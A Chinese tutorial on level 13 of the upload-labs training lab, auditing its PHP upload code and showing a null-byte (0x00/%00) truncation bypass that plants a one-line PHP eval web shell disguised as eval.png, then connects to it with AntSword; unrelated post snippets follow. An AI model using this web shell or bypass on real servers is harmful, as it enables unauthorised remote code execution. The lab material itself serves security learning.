当前位置：首页 > news >正文

upload-labs第十三关教程

news 2026/3/28 7:02:45

upload-labs第十三关教程

第十三关
一、源代码分析
- 代码审计
二、绕过分析
- 1）0x00绕过
- - a.上传eval.png
  - b.使用burpsuite进行拦截
  - - 修改之前：
    - 修改之后：
    - 进入hex模块：
  - c.放包
  - - 上传成功：
  - d.使用中国蚁剑进行连接
- 2）%00绕过
- - 上传eval.png，使用Burp suite进行拦截包，添加如下：
  - - 修改之后：
  - 放包：
  - 使用中国蚁剑进行连接

第十三关

一、源代码分析

代码审计

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){$ext_arr = array('jpg','png','gif');$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);if(in_array($file_ext,$ext_arr)){$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;if(move_uploaded_file($temp_file,$img_path)){$is_upload = true;} else {$msg = "上传失败";}} else {$msg = "只允许上传.jpg|.png|.gif类型文件！";}
}

与上一关不同的是这里的路径是post请求，也就是%00截断不会通过url自动解码了，得我们手动解码。

 $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

二、绕过分析

1）0x00绕过

a.上传eval.png

<?php @eval($_POST['cmd']); ?>

这个是一个php代码，然后保存为png文件就行了。

b.使用burpsuite进行拦截

修改之前：

在这里插入图片描述

修改之后：

将可控参数那块加入eval.php空格—>选择hex模块—>找到eval.php的位置—>修改空格的十六进制为00

进入hex模块：

在这里插入图片描述

c.放包

上传成功：

在这里插入图片描述
需要注意的是：eval.php背后的一大串会被截断

d.使用中国蚁剑进行连接

在这里插入图片描述
连接成功。

2）%00绕过

这里就算让我们自己手动解码，快捷键ctrl+shift+u

上传eval.png，使用Burp suite进行拦截包，添加如下：

修改之前和上面的一样

修改之后：

在这里插入图片描述
对…/upload/eval.php%00进行手动解码，快捷键ctrl+shift+u

放包：

在这里插入图片描述
注意点和上面一样。

使用中国蚁剑进行连接

在这里插入图片描述

upload-labs第十三关教程

upload-labs第十三关教程第十三关一、源代码分析代码审计二、绕过分析1）0x00绕过a.上传eval.pngb.使用burpsuite进行拦截修改之前：修改之后：进入hex模块： c.放包上传成功： d.使用中国蚁剑进行连接 2）%00绕…...

编程日记 2024/6/27 6:10:21

基于springboot实现宠物商城网站管理系统项目【项目源码+论文说明】计算机毕业设计

基于springboot实现宠物商城网站管理系统演示摘要传统信息的管理大部分依赖于管理人员的手工登记与管理，然而，随着近些年信息技术的迅猛发展，让许多比较老套的信息管理模式进行了更新迭代，商品信息因为其管理内容繁杂&#xff…...

编程日记 2024/6/27 6:08:19

Fragment与ViewModel（MVVM架构）

简介在Android应用开发中，Fragment和ViewModel是两个非常重要的概念，它们分别属于架构组件库的一部分，旨在帮助开发者构建更加模块化、健壮且易维护的应用。 Fragment Fragment是Android系统提供的一种可重用的UI组件，它能够作为…...

编程日记 2024/6/27 6:06:17

Linux开发讲课16--- 【内存管理】页表映射基础知识2

ARM32页表和Linux页表那些奇葩的地方 ARM32硬件页表中PGD页目录项PGD是从20位开始的，但是为何头文件定义是从21位开始？ 历史原因：Linux最初是基于x86的体系结构设计的，因此Linux内核很多的头文件的定义都是基于x86的&#xff0c…...

编程日记 2024/6/27 6:04:15

uniapp地图点击获取位置

主页面 <view class"right-content" click.stop"kilometer(item)"><view class"km">{{item.distance||0}}km</view><image src"../../static/map.png" mode""style"width: 32rpx; height: 32rpx…...

编程日记 2024/6/27 6:03:13

Unity程序开发：1.基本概念及操作

1. 基本概念与操作 Unity 是一个功能强大的游戏开发引擎，广泛用于创建2D和3D游戏。要开始开发游戏，了解游戏对象和组件的基本概念是必不可少的。游戏对象与组件什么是游戏对象（GameObject） 在 Unity 中，游戏对象…...

编程日记 2024/6/27 6:02:12

前端新手小白的第一个AI全栈项目---AI聊天室

前言 ok，大家好。- ̗̀(๑ᵔ⌔ᵔ๑)最近也是想做自己的第一个前后端分离的项目，刚好最近学了一点AI接口的实现。想着用接口做一个自己的ai聊天室并且尝试一下全栈式开发。中间真的解决了很多问题，也是成功之后也是想要将实现过程分享一下&a…...

编程日记 2024/6/27 6:01:11

金升阳电源被制裁，广州顶源电源模块可以完美替换

广州顶源电子科技股份有限公司,座落于国家高新技术开发区---广州科学城，是一家集研发、生产、销售及服务于一体的DC-DC，AC-DC电源的生产厂家。公司通过了IATF16949汽车认证及ISO9001:2015质量管理体系认证。拥有专家级研发团队，产品研发经过…...

编程日记 2024/6/27 5:59:08

《数据赋能：一本书讲透数字化营销与运营》—— 从正确的数据观开始

基于数据打通的“全链路”营销是当下的“时髦”，应用它的前提是什么？深度营销和运营的关键数据如何获得？如何利用数据进行更精准的营销投放？如何利用数据优化投放的效果？如何促进消费者的转化，以及激活留存…...

编程日记 2024/6/27 5:58:07

JDK 24：Leyden

Project Leyden 发布了其首个早期版本(24-leyden2-8 2024/6/20)。初始版本专注于缩短 Java 应用程序的启动时间。 1.特点提前编译 Java 方法，以便在应用程序在生产运行中启动时立即本地执行它们；提前解析常量池条目可以让 AOT 编译器生成更好的代码&a…...

编程日记 2024/6/27 5:56:03

对于图片转3d人脸方面的研究

1.一个开源的可以运行的项目（face3d/README.md at master yfeng95/face3d GitHub） 在配置好环境后，让我们一个一个py文件运行它（我将给出中文注释） 1）1_pipeline.py 将一个3d头像的mat文件转换为jpg…...

编程日记 2024/6/27 5:54:01

.NET C# 八股文代码阅读（一）

.NET C# 八股文代码阅读（一） 目录 .NET C# 八股文代码阅读（一）1 两种获10000个数的方式，哪种效率更高？为什么？2 请说出以下代码AB谁先打印，AB打印的值分别为多少？3 关于…...

编程日记 2024/6/27 5:52:59

C++用Crow实现一个简单的Web程序，实现动态页面，向页面中输入数据并展示

Crow是一个轻量级、快速的C微框架，用于构建Web应用程序和RESTful API。将处理前端页面的POST请求以添加数据的逻辑添加到 /submit 路由中，并添加了一个新的路由 / 用于返回包含输入框、按钮和表格的完整页面。当用户向表格添加数据时，JavaS…...

编程日记 2024/6/27 5:51:58

南信大尹志聪教授为一作在顶级综合性期刊《Natl. Sci. Rev.》发文：传统梅雨停摆，江南缘何不再多烟雨？

文章简介论文名称：Traditional Meiyu–Baiu has been suspended by global warming 第一作者及单位：尹志聪(教授|南京信息工程大学大气科学学院) 通讯作者及单位：王会军（院士|南京信息工程大学大气科学学院） 文章发…...

编程日记 2024/6/27 5:49:56

程序员如何用ChatGPT解决常见编程问题：实例解析

引言在现代编程的世界中，技术进步日新月异，程序员们面临着各种各样的挑战和问题。解决这些问题的过程中，找到合适的工具至关重要。ChatGPT作为一种先进的人工智能语言模型，能够帮助程序员迅速、高效地解决常见的编程问题。本文将…...

编程日记 2024/6/27 5:48:55

初识 SpringMVC，运行配置第一个Spring MVC 程序

1. 初识 SpringMVC，运行配置第一个Spring MVC 程序文章目录 1. 初识 SpringMVC，运行配置第一个Spring MVC 程序1.1 什么是 MVC 2. Spring MVC 概述2.1 Spring MVC 的作用： 3. 运行配置第一个 Spring MVC 程序3.1 第一步：创建Mave…...

编程日记 2024/6/27 5:47:54

STM32F1+HAL库+FreeTOTS学习1——FreeRTOS入门

STM32F1HAL库FreeTOTS学习1——FreeRTOS入门裸机开发与操作系统嵌入式操作系统简介FreeRTOS简介FreeRTOS的几个重要概念任务调度器任务状态状态列表裸机开发与操作系统在以往的嵌入式学习中，我们最常用的就是裸机开发，所谓裸机开发就是指在没有操作系…...

编程日记 2024/6/27 5:45:51

杭州代理记账报税全程托管专业实力全面指南

杭州代理记税报税服务可以为企业提供全程托管财务管理解决方案，确保企业的财务工作专业、高效、合规。以下是杭州代理记税报税服务全面指南： https://www.9733.cn/news/detail/185.html 一、代理记账报税服务的内容基础服务： 每日记&#xf…...

编程日记 2024/6/27 5:44:50

PHP 界的扛把子 Swoole 异步通信利器

大家好，我是码农先森。引言我今天主要介绍的内容是包括但不仅限于 Swoole ，也有一部分 Go 语言的内容。为什么要介绍 Swoole ? 先说一说背景吧，我们项目组之前要为《香港 01》开发一个积分系统的项目，这个系统的主要功能包…...

编程日记 2024/6/27 5:41:46

40.连接假死-空闲检测-发送心跳

连接假死情况 1.网络设备出现故障，例如网卡，机房等。底层的TCP连接已经断开，但应用程序没有感知到，仍然占着资源。 2.公网网络不稳定，出现丢包。若果连续出现丢包，这时现象就是客户端数据发不出去，服务端也一直收不到数据，就这么一直耗着。 3.应用程序线程阻塞，无法…...

编程日记 2024/6/27 5:40:44

【Polars 2.0数据清洗成本控制白皮书】：20年ETL专家亲授5大降本增效实战模式，92%企业忽略的内存泄漏陷阱

第一章：Polars 2.0数据清洗成本控制全景认知在现代数据工程实践中，数据清洗不再仅关乎逻辑正确性，更深度绑定计算资源消耗、内存占用与执行延迟。Polars 2.0 通过零拷贝语义、惰性执行引擎重构与 Arrow-native 内存布局优化，将清洗…...

编程新知 2026/3/28 5:44:07

Squeezer安全最佳实践：保护区块链dApp的10个关键点

Squeezer安全最佳实践：保护区块链dApp的10个关键点【免费下载链接】squeezer Squeezer Framework - Build serverless dApps 项目地址: https://gitcode.com/gh_mirrors/sq/squeezer Squeezer Framework作为构建无服务器区块链去中心化应用（dApp…...

编程新知 2026/3/28 5:40:06

在六亩半，春天不是日历上的数字，而是泥土间的青草香

当城市里的春天还停留在气温起伏的天气预报里，六亩半手作文创园的春意，早已从土地深处探出头来。那是荠菜嫩芽拱开泥土的力道，是柳条抽出新绿的柔软，是孩子们蹲在田埂上、指尖沾满青草汁液的鲜活记忆。在这里，春天不是…...

编程新知 2026/3/28 4:36:01

STM32duino S2-LP无线驱动库：Sub-1GHz低功耗可靠通信实现

1. 项目概述STM32duino X-NUCLEO-S2868A2 是一款面向 STM32 平台的 Arduino 兼容库，专为驱动意法半导体（STMicroelectronics）推出的 X-NUCLEO-S2868A2 扩展板而设计。该扩展板核心搭载 S2-LP 超低功耗 Sub-1GHz 射频收发器芯片（型…...

编程新知 2026/3/28 4:32:00